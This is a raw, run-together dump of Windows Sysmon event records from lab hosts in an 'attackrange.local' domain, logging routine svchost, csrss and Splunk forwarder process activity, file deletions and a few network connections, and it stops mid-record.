10341000x80000000000000001046566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.863{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.864{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:41.900{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57176-false10.0.1.14win-dc-890.attackrange.local49676- 10341000x80000000000000001046560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.180{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.498{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57176-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000806382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.224{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net44691-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001046583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE8B17DDBE9E91D7DFC2A57A572C25A,SHA256=BF9B4E6D7B81CA9FF3DF8C0676BAE1DB11E9E528EBBCFAA2D109202032BED696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:51.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=795BA32E063DFA02BF03C4A176274AA8,SHA256=9594C9D355C120A066DD2685509CC412C7444EEAF1FDA543633A3689A00CB336,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.663{466BC892-F32F-60EB-F97C-00000000CF01}47129552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.479{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.479{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.479{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.465{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A013AF3AE0DE6E1A33AB4F41737FD76,SHA256=7B03CF5E2930A06A49BB2381DA1C4A4632E01A49307BB8AD0DD1E02D6C1D1AF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC9D93D5FD6D082CB55C8826AB0AF84,SHA256=45E8F5F835C940D9E65CF94B094786EB923D4A56AF34FE9B77B5AFC8922F6321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.132{466BC892-F32E-60EB-F87C-00000000CF01}90009592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7CAE02A70C67338930F82788DA4CF0,SHA256=9434D7230A72CA32D49E9AED8C35C7390BF4E2D0B3C92CF658674E3B729E439C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:52.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1DD5A1FE797C9DFD5AD184330B0781,SHA256=DD4E20E4D85FCD88B0261AF90D720A94DCA01097B3D6E17A75643B376DDAF898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.896{466BC892-F330-60EB-FB7C-00000000CF01}90288812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 